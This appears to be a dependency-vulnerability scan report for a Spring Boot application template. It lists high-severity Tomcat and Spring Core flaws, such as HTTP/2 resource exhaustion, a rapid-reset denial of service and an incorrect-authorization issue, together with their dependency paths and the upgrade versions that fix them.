  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.8.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-websocket@9.0.65 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.8.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via HTTP/2 multiplexing feature. an attacker can trigger resource exhaustion by creating excessive HTTP/2 streams within a single TCP connection.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.107, 10.1.43, 11.0.9 or higher.

References

high severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-websocket@9.0.65 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.7.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the unwrap() function in SecureNio2Channel class, during a TLS handshake. Under certain configurations using TLS 1.3, an attacker can trigger an OutOfMemoryError.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.90, 10.1.25, 11.0.0-M21 or higher.

References

high severity

Denial of Service (DoS)

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.17.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-websocket@9.0.65 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.17.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Denial of Service (DoS) in the implementation of the HTTP/2 protocol. An attacker can cause a denial of service (including via DDoS) by rapidly resetting many streams through request cancellation.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.94, 9.0.81, 10.1.14, 11.0.0-M12 or higher.

References

high severity

Improper Resource Shutdown or Release

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-websocket@9.0.65 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.9.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Improper Resource Shutdown or Release via the HTTP/2 Handler. An attacker can cause a denial of service by sending specially crafted requests that exploit improper handling of resource shutdown.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.108, 10.1.44, 11.0.10 or higher.

References

high severity

Insufficient Session Expiration

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-websocket@9.0.65 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.7.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Insufficient Session Expiration due to an infinite timeout being assigned to an open connection improperly, in http2/Stream.java. An attacker can force this situation by sending an HTTP/2 stream with excessive headers, causing an out-of-memory error or exhausting maxConnections.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.90, 10.1.25, 11.0.0-M21 or higher.

References

high severity

Integer Overflow or Wraparound

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.8.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-websocket@9.0.65 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.8.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Integer Overflow or Wraparound via file uploads through servlet containers. An attacker can craft malicious multipart/form-data requests with specially crafted Content-Length headers that trigger integer overflow vulnerabilities, potentially bypassing file size restrictions and causing memory exhaustion.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.107, 10.1.43, 11.0.9 or higher.

References

high severity
new

Incorrect Authorization

  • Vulnerable module: org.springframework:spring-core
  • Introduced through: org.springframework.data:spring-data-commons@4.0.0-M6, org.springframework.hateoas:spring-hateoas@1.5.1 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.data:spring-data-commons@4.0.0-M6 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.data:spring-data-commons@4.0.0-M6 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-web@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-web@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-web@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-web@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
